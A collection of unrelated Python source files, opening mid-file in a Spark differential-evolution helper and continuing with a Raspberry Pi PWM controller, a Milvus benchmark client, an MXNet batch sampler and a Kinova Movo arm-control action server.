#Force execution on executor, since GPU is located on executor
global generation_id
global run_id
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | Differential Evolution, Generation: {}".format(name, generation_id))
nodeRDD.foreachPartition(_prepare_func(app_id, generation_id, train_fn, args_dict, run_id, opt_key))
generation_id += 1
return experiment_utils._get_experiments_dir() + '/' + str(app_id) + "_" + str(run_id)
#Helper to put Spark required parameter iter in function signature
def _prepare_func(app_id, generation_id, train_fn, args_dict, run_id, opt_key):
"""
Args:
:app_id:
:generation_id:
:train_fn:
:args_dict:
:run_id:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
:iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
global local_logdir_bool
try:
#Arguments
if args_dict:
param_string, params, args = experiment_utils.build_parameters(train_fn, executor_num, args_dict)
val = _get_return_file(param_string, app_id, generation_id, run_id)
hdfs_exec_logdir, hdfs_appid_logdir = experiment_utils._create_experiment_subdirectories(app_id, run_id, param_string, 'differential_evolution', sub_type='generation.' + str(generation_id), params=params)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir_bool)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task ' + param_string)
if val is not None:
val = json.loads(val)
task_start = time.time()
if val is None:
val = train_fn(*args)
task_end = time.time()
time_str = 'Finished task ' + param_string + ' - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
experiment_utils._handle_return(val, hdfs_exec_logdir, opt_key, logfile)
print('Returning metric ' + str(val))
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
def _get_return_file(param_string, app_id, generation_id, run_id):
"""
Args:
:param_string:
:app_id:
:generation_id:
:run_id:
Returns:
"""
handle = hdfs.get()
for i in range(generation_id):
possible_result_path = experiment_utils._get_experiments_dir() + '/' + app_id + '_' \
+ str(run_id) + '/generation.' + str(i) + '/' + param_string + '/.outputs.json'
if handle.exists(possible_result_path):
return_file_contents = hdfs.load(possible_result_path)
return return_file_contents
return None
def _get_best(root_logdir, direction):
min_val = sys.float_info.max
min_logdir = None
max_val = -sys.float_info.max  # most negative finite float, so negative metrics are handled correctly
max_logdir = None
generation_folders = hdfs.ls(root_logdir)
generation_folders.sort()
for generation in generation_folders:
for individual in hdfs.ls(generation):
invidual_files = hdfs.ls(individual, recursive=True)
for file in invidual_files:
if file.endswith("/.metric"):
val = hdfs.load(file)
val = float(val)
if val > max_val:
max_val = val
max_logdir = file[:-8]
if val < min_val:
min_val = val
min_logdir = file[:-8]
if direction.upper() == Direction.MAX:
return_dict = {}
with hdfs.open_file(max_logdir + '/.outputs.json', flags="r") as fi:
return_dict = json.loads(fi.read())
fi.close()
return max_logdir, return_dict
else:
return_dict = {}
with hdfs.open_file(min_logdir + '/.outputs.json', flags="r") as fi:
return_dict = json.loads(fi.read())
fi.close()
return min_logdir, return_dict
|
controller.py
|
#
# This software is released under the MIT License, see LICENSE
#
# Copyright (c) 2020 chimo
#
import RPi.GPIO as GPIO
import time
import os
import threading
import Queue as queue
# pin name
SPICLK = 11
SPIMOSI = 10
SPIMISO = 9
SPICS = 8
GPIO17 = 17 # pin11
GPIO27 = 27 # pin13
vol_old = 0
def pwm(q,event):
print('pwm()')
global pwm1
try:
while True:
event.wait()
dc = q.get()
pwm1.ChangeDutyCycle(dc)
print('ChangeDutyCycle',dc)
except KeyboardInterrupt:
pass
def volume(q,event):
print('volume()')
# pin name
global SPICLK
global SPIMOSI
global SPIMISO
global SPICS
global vol_old
try:
while True:
inputVal0 = readadc(0, SPICLK, SPIMOSI, SPIMISO, SPICS)
vol = "{0}".format(int(inputVal0*100/1023)) #1023
if vol_old != vol:
print('Yes',vol,vol_old)
vol_old = vol
q.put(vol)
event.set()
else:
print('No',vol)
time.sleep(0.2)
except KeyboardInterrupt:
pass
def readadc(adcnum, clockpin, mosipin, misopin, cspin):
print('readadc() start')
if adcnum > 1 or adcnum < 0:
return -1
GPIO.output(cspin, GPIO.HIGH) # CS high (idle)
GPIO.output(clockpin, GPIO.LOW) # clock low (idle)
GPIO.output(cspin, GPIO.LOW) # pull CS low to start the conversion
#commandout = 0b01101000
commandout = adcnum # channel select bit
commandout |= 0x0d # start bit, single-ended mode, MSB first
commandout <<= 3 # left-align so the command bits are clocked out first
for i in range(4):
# clock out the top 4 command bits, MSB first
if commandout & 0x80:
GPIO.output(mosipin, GPIO.HIGH)
else:
GPIO.output(mosipin, GPIO.LOW)
commandout <<= 1
GPIO.output(clockpin, GPIO.HIGH)
GPIO.output(clockpin, GPIO.LOW)
adcout = 0
# read back 11 clocks: one null bit followed by the 10-bit result
for i in range(11):
GPIO.output(clockpin, GPIO.HIGH)
GPIO.output(clockpin, GPIO.LOW)
adcout <<= 1
if i>0 and GPIO.input(misopin)==GPIO.HIGH:
adcout |= 0x1
GPIO.output(cspin, GPIO.HIGH)
print('readadc() end')
return adcout
def main():
#initialize
GPIO.setmode(GPIO.BCM)
# pin name
global SPICLK
global SPIMOSI
global SPIMISO
global SPICS
global GPIO17 # pin11
global GPIO27 # pin13
global pwm1
global pwm2
# SPI
GPIO.setup(SPICLK, GPIO.OUT)
GPIO.setup(SPIMOSI, GPIO.OUT)
GPIO.setup(SPIMISO, GPIO.IN)
GPIO.setup(SPICS, GPIO.OUT)
#pwm
GPIO.setup(GPIO17, GPIO.OUT)
GPIO.setup(GPIO27, GPIO.OUT)
pwm1 = GPIO.PWM(GPIO17, 100) # frequency 100Hz
pwm2 = GPIO.PWM(GPIO27, 100) # frequency 100Hz
pwm1.start(0)
pwm2.start(0)
print('main() initialize done')
try:
q = queue.Queue()
event = threading.Event()
t1 = threading.Thread(target=volume, args=(q,event))
t2 = threading.Thread(target=pwm, args=(q,event))
t1.start()
t2.start()
while True:
time.sleep(0.1)
except KeyboardInterrupt:
pass
pwm1.stop()
pwm2.stop()
GPIO.cleanup()
if __name__ == '__main__':
main()
|
client.py
|
import sys
import pdb
import random
import logging
import json
import time, datetime
from multiprocessing import Process
from milvus import Milvus, IndexType, MetricType
logger = logging.getLogger("milvus_benchmark.client")
SERVER_HOST_DEFAULT = "127.0.0.1"
# SERVER_HOST_DEFAULT = "192.168.1.130"
SERVER_PORT_DEFAULT = 19530
INDEX_MAP = {
"flat": IndexType.FLAT,
"ivf_flat": IndexType.IVFLAT,
"ivf_sq8": IndexType.IVF_SQ8,
"nsg": IndexType.RNSG,
"ivf_sq8h": IndexType.IVF_SQ8H,
"ivf_pq": IndexType.IVF_PQ,
"hnsw": IndexType.HNSW,
"annoy": IndexType.ANNOY
}
epsilon = 0.1
def time_wrapper(func):
"""
This decorator prints the execution time for the decorated function.
"""
def wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
logger.info("Milvus {} run in {}s".format(func.__name__, round(end - start, 2)))
return result
return wrapper
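# Illustrative usage (editor's sketch): any function can be timed the same
# way as the client methods below, e.g.
#
#   @time_wrapper
#   def load_dataset(path):
#       ...
#
# Each call then logs a line such as "Milvus load_dataset run in 1.23s" at
# INFO level (the "Milvus" prefix is hard-coded in the wrapper).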
class MilvusClient(object):
def __init__(self, collection_name=None, ip=None, port=None, timeout=60):
self._collection_name = collection_name
try:
i = 1
start_time = time.time()
if not ip:
self._milvus = Milvus(
host = SERVER_HOST_DEFAULT,
port = SERVER_PORT_DEFAULT)
else:
# retry connect for remote server
while time.time() < start_time + timeout:
try:
self._milvus = Milvus(
host = ip,
port = port)
if self._milvus.server_status():
logger.debug("Try connect times: %d, %s" % (i, round(time.time() - start_time, 2)))
break
except Exception as e:
logger.debug("Milvus connect failed")
i = i + 1
except Exception as e:
raise e
def __str__(self):
return 'Milvus collection %s' % self._collection_name
def check_status(self, status):
if not status.OK():
logger.error(status.message)
raise Exception("Status not ok")
def check_result_ids(self, result):
for index, item in enumerate(result):
if item[0].distance >= epsilon:
logger.error(index)
logger.error(item[0].distance)
raise Exception("Distance wrong")
def create_collection(self, collection_name, dimension, index_file_size, metric_type):
if not self._collection_name:
self._collection_name = collection_name
if metric_type == "l2":
metric_type = MetricType.L2
elif metric_type == "ip":
metric_type = MetricType.IP
elif metric_type == "jaccard":
metric_type = MetricType.JACCARD
elif metric_type == "hamming":
metric_type = MetricType.HAMMING
elif metric_type == "sub":
metric_type = MetricType.SUBSTRUCTURE
elif metric_type == "super":
metric_type = MetricType.SUPERSTRUCTURE
else:
logger.error("Not supported metric_type: %s" % metric_type)
create_param = {'collection_name': collection_name,
'dimension': dimension,
'index_file_size': index_file_size,
"metric_type": metric_type}
status = self._milvus.create_collection(create_param)
self.check_status(status)
@time_wrapper
def insert(self, X, ids=None):
status, result = self._milvus.add_vectors(self._collection_name, X, ids)
self.check_status(status)
return status, result
@time_wrapper
def delete_vectors(self, ids):
status = self._milvus.delete_by_id(self._collection_name, ids)
self.check_status(status)
@time_wrapper
def flush(self):
status = self._milvus.flush([self._collection_name])
self.check_status(status)
@time_wrapper
def compact(self):
status = self._milvus.compact(self._collection_name)
self.check_status(status)
@time_wrapper
def create_index(self, index_type, index_param=None):
index_type = INDEX_MAP[index_type]
logger.info("Building index start, collection_name: %s, index_type: %s" % (self._collection_name, index_type))
if index_param:
logger.info(index_param)
status = self._milvus.create_index(self._collection_name, index_type, index_param)
self.check_status(status)
def describe_index(self):
status, result = self._milvus.describe_index(self._collection_name)
self.check_status(status)
index_type = None
for k, v in INDEX_MAP.items():
if result._index_type == v:
index_type = k
break
return {"index_type": index_type, "index_param": result._params}
def drop_index(self):
logger.info("Drop index: %s" % self._collection_name)
return self._milvus.drop_index(self._collection_name)
@time_wrapper
def query(self, X, top_k, search_param=None):
status, result = self._milvus.search_vectors(self._collection_name, top_k, query_records=X, params=search_param)
self.check_status(status)
return result
@time_wrapper
def query_ids(self, top_k, ids, search_param=None):
status, result = self._milvus.search_by_ids(self._collection_name, ids, top_k, params=search_param)
self.check_result_ids(result)
return result
def count(self):
return self._milvus.count_collection(self._collection_name)[1]
def delete(self, timeout=120):
timeout = int(timeout)
logger.info("Start delete collection: %s" % self._collection_name)
self._milvus.drop_collection(self._collection_name)
i = 0
while i < timeout:
if self.count():
time.sleep(1)
i = i + 1
continue
else:
break
if i >= timeout:
logger.error("Delete collection timeout")
def describe(self):
return self._milvus.describe_collection(self._collection_name)
def show_collections(self):
return self._milvus.show_collections()
def exists_collection(self, collection_name=None):
if collection_name is None:
collection_name = self._collection_name
status, res = self._milvus.has_collection(collection_name)
# self.check_status(status)
return res
@time_wrapper
def preload_collection(self):
status = self._milvus.preload_collection(self._collection_name, timeout=3000)
self.check_status(status)
return status
def get_server_version(self):
status, res = self._milvus.server_version()
return res
def get_server_mode(self):
return self.cmd("mode")
def get_server_commit(self):
return self.cmd("build_commit_id")
def get_server_config(self):
return json.loads(self.cmd("get_config *"))
def get_mem_info(self):
result = json.loads(self.cmd("get_system_info"))
result_human = {
# unit: Gb
"memory_used": round(int(result["memory_used"]) / (1024*1024*1024), 2)
}
return result_human
def cmd(self, command):
status, res = self._milvus._cmd(command)
logger.info("Server command: %s, result: %s" % (command, res))
self.check_status(status)
return res
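# Minimal usage sketch (editor's addition; the collection name, dimension and
# index parameters are made up for illustration):
#
#   m = MilvusClient("bench_collection")
#   m.create_collection("bench_collection", 128, 1024, "l2")
#   vectors = [[random.random() for _ in range(128)] for _ in range(1000)]
#   m.insert(vectors)
#   m.flush()
#   m.create_index("ivf_flat", {"nlist": 1024})
#   results = m.query(vectors[:5], 10, search_param={"nprobe": 16})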
def fit(collection_name, X):
milvus = Milvus()
milvus.connect(host = SERVER_HOST_DEFAULT, port = SERVER_PORT_DEFAULT)
start = time.time()
status, ids = milvus.add_vectors(collection_name, X)
end = time.time()
logger.info("add_vectors status: %s, cost: %ss" % (status, round(end - start, 2)))
def fit_concurrent(collection_name, process_num, vectors):
processes = []
for i in range(process_num):
p = Process(target=fit, args=(collection_name, vectors, ))
processes.append(p)
p.start()
for p in processes:
p.join()
if __name__ == "__main__":
import numpy
import sklearn.preprocessing
# collection_name = "tset_test"
# # collection_name = "test_tset1"
# m = MilvusClient(collection_name)
# m.delete()
# time.sleep(2)
# m.create_collection(collection_name, 128, 20, "ip")
# print(m.describe())
# print(m.count())
# print(m.describe_index())
# # sys.exit()
# tmp = [[random.random() for _ in range(128)] for _ in range(20000)]
# tmp1 = sklearn.preprocessing.normalize(tmp, axis=1, norm='l2')
# print(tmp1[0][0])
# tmp = [[random.random() for _ in range(128)] for _ in range(20000)]
# tmp /= numpy.linalg.norm(tmp)
# print(tmp[0][0])
# sum_1 = 0
# sum_2 = 0
# for item in tmp:
# for i in item:
# sum_2 = sum_2 + i * i
# break
# for item in tmp1:
# for i in item:
# sum_1 = sum_1 + i * i
# break
# print(sum_1, sum_2)
# insert_vectors = tmp.tolist()
# # print(insert_vectors)
# for i in range(2):
# m.insert(insert_vectors)
# time.sleep(5)
# print(m.create_index("ivf_flat", 16384))
# X = [insert_vectors[0], insert_vectors[1], insert_vectors[2]]
# top_k = 5
# nprobe = 1
# print(m.query(X, top_k, nprobe))
# # print(m.drop_index())
# print(m.describe_index())
# sys.exit()
# # insert_vectors = [[random.random() for _ in range(128)] for _ in range(100000)]
# # for i in range(100):
# # m.insert(insert_vectors)
# # time.sleep(5)
# # print(m.describe_index())
# # print(m.drop_index())
# m.create_index("ivf_sq8h", 16384)
# print(m.count())
# print(m.describe_index())
# sys.exit()
# print(m.create_index("ivf_sq8h", 16384))
# print(m.count())
# print(m.describe_index())
import numpy as np
# def mmap_fvecs(fname):
# x = np.memmap(fname, dtype='int32', mode='r')
# d = x[0]
# return x.view('float32').reshape(-1, d + 1)[:, 1:]
# print(mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs"))
# SIFT_SRC_QUERY_DATA_DIR = '/poc/yuncong/ann_1000m'
# file_name = SIFT_SRC_QUERY_DATA_DIR+'/'+'query.npy'
# data = numpy.load(file_name)
# query_vectors = data[0:2].tolist()
# print(len(query_vectors))
# results = m.query(query_vectors, 10, 10)
# result_ids = []
# for result in results[1]:
# tmp = []
# for item in result:
# tmp.append(item.id)
# result_ids.append(tmp)
# print(result_ids[0][:10])
# # gt
# file_name = SIFT_SRC_QUERY_DATA_DIR+"/gnd/"+"idx_1M.ivecs"
# a = numpy.fromfile(file_name, dtype='int32')
# d = a[0]
# true_ids = a.reshape(-1, d + 1)[:, 1:].copy()
# print(true_ids[:3, :2])
# print(len(true_ids[0]))
# import numpy as np
# import sklearn.preprocessing
# def mmap_fvecs(fname):
# x = np.memmap(fname, dtype='int32', mode='r')
# d = x[0]
# return x.view('float32').reshape(-1, d + 1)[:, 1:]
# data = mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs")
# data = sklearn.preprocessing.normalize(data, axis=1, norm='l2')
# np.save("/test/milvus/deep1b/query.npy", data)
dimension = 4096
insert_xb = 10000
insert_vectors = [[random.random() for _ in range(dimension)] for _ in range(insert_xb)]
data = sklearn.preprocessing.normalize(insert_vectors, axis=1, norm='l2')
np.save("/test/milvus/raw_data/random/query_%d.npy" % dimension, data)
sys.exit()
total_size = 100000000
# total_size = 1000000000
file_size = 100000
# file_size = 100000
dimension = 4096
file_num = total_size // file_size
for i in range(file_num):
print(i)
# fname = "/test/milvus/raw_data/deep1b/binary_96_%05d" % i
fname = "/test/milvus/raw_data/random/binary_%dd_%05d" % (dimension, i)
# print(fname, i*file_size, (i+1)*file_size)
# single_data = data[i*file_size : (i+1)*file_size]
single_data = [[random.random() for _ in range(dimension)] for _ in range(file_size)]
single_data = sklearn.preprocessing.normalize(single_data, axis=1, norm='l2')
np.save(fname, single_data)
|
abstractBatchSampler.py
|
import cv2
import time
import numpy as np
import mxnet as mx
import mxnet.ndarray as nd
from enum import Enum
from dataProcessor.imageProcessor import ImageProcessor
from dataProcessor.imageSampler import ImageSampler
from dataProcessor.miningTypes import MiningTypes
from multiprocessing import Process, Queue
class AbstractBatchSampler():
def __init__(self, batch_size, image_sampler, net=None, ctx=mx.cpu(), channels=3):
self.batch_size = batch_size
self.image_sampler = image_sampler
self.ctx = ctx
self.net = net
self.channels = channels
self.batches = Queue()
for worker in range(0,8):
fillDeamon = Process(target=self.fillDeamon, args=(self.batches,))
fillDeamon.daemon = True
fillDeamon.start()
def fillDeamon(self, queue):
while True:
while queue.qsize() < 32:
self.fill(queue)
time.sleep(1)
def fill(self, queue):
queue.put(self.prepareBatch())
def take(self):
return self.batches.get()
def getBatch(self, validation=False, file=None):
if self.batches.qsize() > 0:
return self.take()
else:
time.sleep(1)
return self.getBatch(validation=validation, file=file)
def prepareBatch(self, validation=False, train=False):
raise NotImplementedError("subclasses must implement prepareBatch()")
def reset(self):
self.image_sampler.reset()
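# Editor's sketch of a concrete subclass (illustrative only; the tensor shapes
# are assumptions): prepareBatch is the one method a subclass must provide.
# It runs inside the worker processes and whatever it returns is what
# getBatch()/take() hand back from the queue.
#
#   class RandomBatchSampler(AbstractBatchSampler):
#       def prepareBatch(self, validation=False, train=False):
#           data = nd.random.uniform(shape=(self.batch_size, self.channels, 224, 224))
#           labels = nd.zeros((self.batch_size,))
#           return data, labels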
|
movo_jtas.py
|
"""--------------------------------------------------------------------
Copyright (c) 2017, Kinova Robotics inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\file movo_jtas.py
\brief This module offer an interface to control the movo arms
\Platform: Linux/ROS Indigo
--------------------------------------------------------------------"""
from movo_joint_interface.jaco_joint_controller import SIArmController
from trajectory_smoother import TrajectorySmoother
from moveit_python import MoveGroupInterface
from moveit_msgs.msg import MoveItErrorCodes
from control_msgs.msg import (
FollowJointTrajectoryAction,
FollowJointTrajectoryFeedback,
FollowJointTrajectoryResult,
GripperCommandAction,
GripperCommandFeedback,
GripperCommandResult,
)
from trajectory_msgs.msg import JointTrajectoryPoint
from std_msgs.msg import UInt16,Bool
from movo_msgs.msg import Status
from threading import Thread
import errno
import math
import rospy
import actionlib
import bisect
import operator
from copy import deepcopy
def calc_grip_dist(b):
l1 = 30.9476-87.0932*math.sin(b[0]-0.627445866)
l2 = 30.9476-87.0932*math.sin(b[1]-0.627445866)
dist = l1+l2
if (dist < (2*30.9476)):
dist-=17.0
else:
dist+=1.08
return (dist * 0.001)
def calc_grip_angle(x):
dist = x*1000.0
tmp = (0.5*dist-30.9476)/-87.0932
a = math.asin(tmp)+0.627445866
if (0.5*dist > 30.9476):
a+=0.00599
else:
a-=0.1
return (a)
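# Editor's note (approximate values derived from the formulas above): the two
# helpers convert between finger angle (rad) and gripper opening (m).
# calc_grip_angle(0.165) evaluates to roughly 0.0 rad (fully open) and
# calc_grip_angle(0.0) to roughly 0.89 rad (fully closed), matching the
# 0.0-0.165 m close/open range used by the gripper action below.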
class MovoArmJTAS(object):
def __init__(self, prefix="", gripper="", interface='eth0', jaco_ip="10.66.171.15", dof="", rate=100.0):
self._alive = False
self.init_success = True
self._action_name = rospy.get_name()
self._prefix = prefix
# Action Feedback/Result
if ("kg2" == gripper):
self.gripper_stall_force = 20.0
self.gripper_dead_zone = 0.01
elif("kg3" == gripper):
self.gripper_stall_force = 30.0
self.gripper_dead_zone = 0.01
self._last_gripper_pos = 0.165
self._gripper_stall_to = 0.7
self._gripper_pos_stall = False
self._last_movement_time = rospy.get_time()
self.dof = dof
self._planner_homing = False
"""
Define the joint names
"""
if ("6dof" == dof):
self._joint_names = [self._prefix+'_shoulder_pan_joint',
self._prefix+'_shoulder_lift_joint',
self._prefix+'_elbow_joint',
self._prefix+'_wrist_1_joint',
self._prefix+'_wrist_2_joint',
self._prefix+'_wrist_3_joint']
self._body_joints = ["right_elbow_joint",
"right_shoulder_lift_joint",
"right_shoulder_pan_joint",
"right_wrist_1_joint",
"right_wrist_2_joint",
"right_wrist_3_joint",
"left_elbow_joint",
"left_shoulder_lift_joint",
"left_shoulder_pan_joint",
"left_wrist_1_joint",
"left_wrist_2_joint",
"left_wrist_3_joint",
"linear_joint",
"pan_joint",
"tilt_joint"]
self._homed = [-2.135, -0.227, -1.478, -2.083, 1.445, 1.321, 2.135, 0.227, 1.478, 2.083, -1.445, -1.321, 0.25, 0.0, 0.0]
elif ("7dof" == dof):
self._joint_names = [self._prefix + '_shoulder_pan_joint',
self._prefix + '_shoulder_lift_joint',
self._prefix + '_arm_half_joint',
self._prefix + '_elbow_joint',
self._prefix + '_wrist_spherical_1_joint',
self._prefix + '_wrist_spherical_2_joint',
self._prefix + '_wrist_3_joint']
self._body_joints = ["right_shoulder_pan_joint",
"right_shoulder_lift_joint",
"right_arm_half_joint",
"right_elbow_joint",
"right_wrist_spherical_1_joint",
"right_wrist_spherical_2_joint",
"right_wrist_3_joint",
"left_shoulder_pan_joint",
"left_shoulder_lift_joint",
"left_arm_half_joint",
"left_elbow_joint",
"left_wrist_spherical_1_joint",
"left_wrist_spherical_2_joint",
"left_wrist_3_joint",
"linear_joint",
"pan_joint",
"tilt_joint"]
self._homed = [-1.5, -0.2, -0.15, -2.0, 2.0, -1.24, -1.1, 1.5, 0.2, 0.15, 2.0, -2.0, 1.24, 1.1, 0.25, 0, 0]
else:
rospy.logerr("DoF needs to be set 6 or 7, cannot start MovoArmJTAS")
return
"""
Controller parameters from arguments, messages, and dynamic
reconfigure
"""
self._trajectory_control_rate = rate # Hz
self._goal_time = 0.0
self._stopped_velocity = 0.0
self._goal_error = dict()
self._path_thresh = dict()
self._traj_smoother = TrajectorySmoother(rospy.get_name(),self._prefix)
self._ctl = SIArmController(self._prefix,gripper,interface,jaco_ip, dof)
self._ctl.Pause()
self._estop_delay = 0
self.home_arm_sub = rospy.Subscriber('/movo/home_arms', Bool, self._home_arms)
self.home_arm_pub = rospy.Publisher('/movo/arms_are_homed', Bool, queue_size=1)
self._arms_homing = False
if not self._ctl.init_success:
rospy.logerr("Failed to initialize controller, make sure the serial number exists")
self.clean_shutdown()
self.init_success = False
return
self.estop = False
self._fdbk = FollowJointTrajectoryFeedback()
self._result = FollowJointTrajectoryResult()
#self._dyn = reconfig_server
self._ns = '/movo/%s_arm_controller'%self._prefix
self._fjt_ns = self._ns + '/follow_joint_trajectory'
self._server = actionlib.SimpleActionServer(
self._fjt_ns,
FollowJointTrajectoryAction,
execute_cb=self._on_trajectory_action,
auto_start=False)
self._alive = True
self._movo_status_sub = rospy.Subscriber("/movo/feedback/status",Status,self._update_movo_status)
self._server.start()
# Action Server
self._gripper_server = actionlib.SimpleActionServer(
'/movo/%s_gripper_controller/gripper_cmd'%self._prefix,
GripperCommandAction,
execute_cb=self._on_gripper_action,
auto_start=False)
self._gripper_server.start()
self._gripper_action_name = '/movo/%s_gripper_controller/gripper_cmd'%self._prefix
# Action Feedback/Result
self._gripper_fdbk = GripperCommandFeedback()
self._gripper_result = GripperCommandResult()
self._gripper_timeout = 6.0
self._ctl.api.InitFingers()
def _home_arm_planner(self):
if self._prefix == 'left':
rospy.sleep(5)
else:
move_group_jtas = MoveGroupInterface("upper_body", "base_link")
move_group_jtas.setPlannerId("RRTConnectkConfigDefault")
success = False
while not rospy.is_shutdown() and not success:
result = move_group_jtas.moveToJointPosition(self._body_joints, self._homed, 0.05)
if result.error_code.val == MoveItErrorCodes.SUCCESS:
rospy.logerr("_home_arm_planner completed ")
success = True
else:
rospy.logerr("_home_arm_planner: _home_arm_planner failed (%d)" % result.error_code.val)
self._arms_homing = True
self._ctl.api.MoveHome()
self._ctl.api.InitFingers()
self.home_arm_pub.publish(Bool(True))
rospy.sleep(2.0)
self._arms_homing = False
self._planner_homing = False
def _update_gripper_feedback(self, position):
tmp = self._ctl.GetGripperFdbk()
grip_dist = calc_grip_dist(tmp[0])
self._gripper_fdbk.position = grip_dist
self._gripper_fdbk.effort = sum(tmp[2])
self._gripper_fdbk.stalled = (self._gripper_fdbk.effort >
self.gripper_stall_force)
self._gripper_fdbk.reached_goal = (math.fabs(grip_dist -
position) <
self.gripper_dead_zone)
delta = math.fabs(self._gripper_fdbk.position - self._last_gripper_pos)
self._last_gripper_pos = self._gripper_fdbk.position
if (delta > 0.005):
self._last_movement_time = rospy.get_time()
if (rospy.get_time() - self._last_movement_time) > self._gripper_stall_to:
self._gripper_pos_stall=True
else:
self._gripper_pos_stall=False
self._gripper_fdbk.stalled |= self._gripper_pos_stall
self._gripper_result = self._gripper_fdbk
self._gripper_server.publish_feedback(self._gripper_fdbk)
def _command_gripper(self, position):
ang = calc_grip_angle(position)
self._ctl.CommandGripper(ang)
def _check_gripper_state(self):
return (self._gripper_fdbk.stalled or self._gripper_fdbk.reached_goal)
def _on_gripper_action(self, goal):
# Store position and effort from call
# Position to 0:0.165 == close:open
position = goal.command.position
effort = goal.command.max_effort
print(position)
# Reset feedback/result
self._update_gripper_feedback(position)
# 20 Hz gripper state rate
control_rate = rospy.Rate(20.0)
# Record start time
start_time = rospy.get_time()
def now_from_start(start):
return rospy.get_time() - start
# Continue commanding goal until success or timeout
self._last_movement_time = rospy.get_time()
self._last_gripper_pos = self._gripper_fdbk.position
while ((now_from_start(start_time) < self._gripper_timeout or
self._gripper_timeout < 0.0) and not rospy.is_shutdown()):
if self._gripper_server.is_preempt_requested():
self._ctl.StopGripper()
rospy.loginfo("%s: Gripper Action Preempted" %
(self._gripper_action_name,))
self._gripper_server.set_preempted(self._gripper_result)
return
self._update_gripper_feedback(position)
if self._check_gripper_state():
self._gripper_server.set_succeeded(self._gripper_result)
return
self._command_gripper(position)
control_rate.sleep()
# Gripper failed to achieve goal before timeout/shutdown
self._ctl.StopGripper()
if not rospy.is_shutdown():
rospy.logerr("%s: Gripper Command Not Achieved in Allotted Time" %
(self._gripper_action_name,))
self._update_gripper_feedback(position)
self._gripper_server.set_aborted(self._gripper_result)
def _home_arms(self,cmd):
if (True == cmd.data and self._planner_homing == False):
self._planner_homing = True
b_thread = Thread(target=self._home_arm_planner, args=())  # pass the callable itself; calling it here would run the planner in this thread
b_thread.daemon = True
b_thread.start()
def _update_movo_status(self,status):
if (0 != status.dynamic_response) or (False == self._ctl.GetCtlStatus()) or self._arms_homing:
self.estop = True
self._ctl.SetEstop()
self._estop_delay = 100
else:
if (0 == self._estop_delay):
self.estop = False
self._ctl.ClearEstop()
else:
self.estop = True
self._ctl.SetEstop()
self._estop_delay -= 1
def robot_is_enabled(self):
return not self.estop
def clean_shutdown(self):
self._ctl.Stop()
self._alive = False
def _get_trajectory_parameters(self, joint_names, goal):
"""
For each input trajectory, if path, goal, or goal_time tolerances
provided, we will use these as opposed to reading from the
parameter server/dynamic reconfigure
"""
"""
Goal time tolerance - time buffer allowing goal constraints to be met
"""
if goal.goal_time_tolerance:
self._goal_time = goal.goal_time_tolerance.to_sec()
else:
self._goal_time = 1.0
"""
Stopped velocity tolerance - max velocity at end of execution
"""
self._stopped_velocity = 0.5
"""
Path execution and goal tolerances per joint
"""
for jnt in joint_names:
if jnt not in self._joint_names:
rospy.logerr(
"%s: Trajectory Aborted - Provided Invalid Joint Name %s" %
(self._action_name, jnt,))
self._result.error_code = self._result.INVALID_JOINTS
self._server.set_aborted(self._result)
return
"""
Path execution tolerance
"""
self._path_thresh[jnt] = 0.5
if goal.path_tolerance:
for tolerance in goal.path_tolerance:
if jnt == tolerance.name:
self._path_thresh[jnt] = tolerance.position
"""
Goal error tolerance
"""
self._goal_error[jnt] = 0.5
if goal.goal_tolerance:
for tolerance in goal.goal_tolerance:
if jnt == tolerance.name:
self._goal_error[jnt] = tolerance.position
def _get_current_position(self, joint_names):
return self._ctl.GetCurrentJointPosition(joint_names)
def _get_current_velocities(self, joint_names):
return self._ctl.GetCurrentJointVelocity(joint_names)
def _get_current_errors(self, joint_names):
error = self._ctl.GetCurrentJointPositionError(joint_names)
return zip(joint_names, error)
def _update_feedback(self, cmd_point, joint_names, cur_time):
self._fdbk.header.stamp = rospy.Duration.from_sec(rospy.get_time())
self._fdbk.joint_names = joint_names
self._fdbk.desired = cmd_point
self._fdbk.desired.time_from_start = rospy.Duration.from_sec(cur_time)
self._fdbk.actual.positions = self._get_current_position(joint_names)
self._fdbk.actual.time_from_start = rospy.Duration.from_sec(cur_time)
